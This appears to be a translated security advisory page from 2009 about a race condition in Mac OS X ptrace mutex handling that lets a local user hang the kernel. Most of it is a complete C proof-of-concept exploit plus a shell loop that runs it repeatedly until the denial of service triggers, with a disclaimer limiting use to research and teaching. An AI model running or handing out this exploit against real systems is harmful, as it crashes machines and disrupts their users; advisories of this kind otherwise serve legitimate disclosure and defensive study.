Apple Mac OS X ptrace Mutex Handling Local Denial-of-Service Vulnerability
Source: 岁月联盟
Date: 2009-11-11
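Apple Mac OS X 10.6.1
Apple Mac OS X 10.5.7
Apple Mac OS X 10.5.6

Vulnerability description:
BUGTRAQ ID: 36915

Mac OS X is the operating system used on Apple's family of machines. The ptrace implementation in Mac OS X has a race condition in its mutex handling. The error can be triggered when the kernel attempts to interlock a mutex that has already been freed, leaving the kernel busy.

References:
Micheal Turner (wh1t3h4t3@yahoo.co.uk)
Links:
http://secunia.com/advisories/37238/
http://marc.info/?l=full-disclosure&m=125734118204158&w=2

Test method: [www.sebug.net]
The programs (methods) provided on this site may carry security risks and are intended for security research and teaching only; use at your own risk!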
/* Mac OS X 10.5.6-10.6.1 ptrace() mutex handling DoS
   ==================================================
   This code should be run in a loop and due to problems
   with mutex handling in ptrace a DoS can occur when a
   destroyed mutex is attempted to be interlocked by OSX
   kernel giving rise to a race condition. You may need
   to run this code multiple times.

   - Tested against 10.5.6
   - Tested against 10.5.7
   - Tested against 10.6.1

   while `true`;do ./prdelka-vs-APPLE-ptracepanic;done

   -- prdelka
*/
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/wait.h>   /* wait() */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>     /* fork(), execve(), usleep() */

int main(){
    pid_t pid;
    char *argv[] = {"id","","",0};
    char *envp[] = {"",0};

    pid = fork();
    if(pid == 0){
        /* child: short delay, then exec /usr/bin/id */
        usleep(100);
        execve("/usr/bin/id",argv,envp);
    }
    else{
        /* parent: attach to and detach from the child around its exec/exit */
        usleep(820);
        if(ptrace(PT_ATTACH,pid,0,0)==0){
            printf("[ PID: %d has been caught!\n",pid);
            if(ptrace(PT_DETACH,pid,0,0)<0){
                perror("Evil happens.");
            }
            usleep(1);
            wait(0);
        }
        else{
            perror("Fail!");
        }
    }
    return(0);
}

SEBUG security advisory:
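Vendor patch:
Apple
-----
The vendor has not yet provided a patch or upgrade. We recommend that users of this software keep watching the vendor's home page for the latest version:
http://www.apple.com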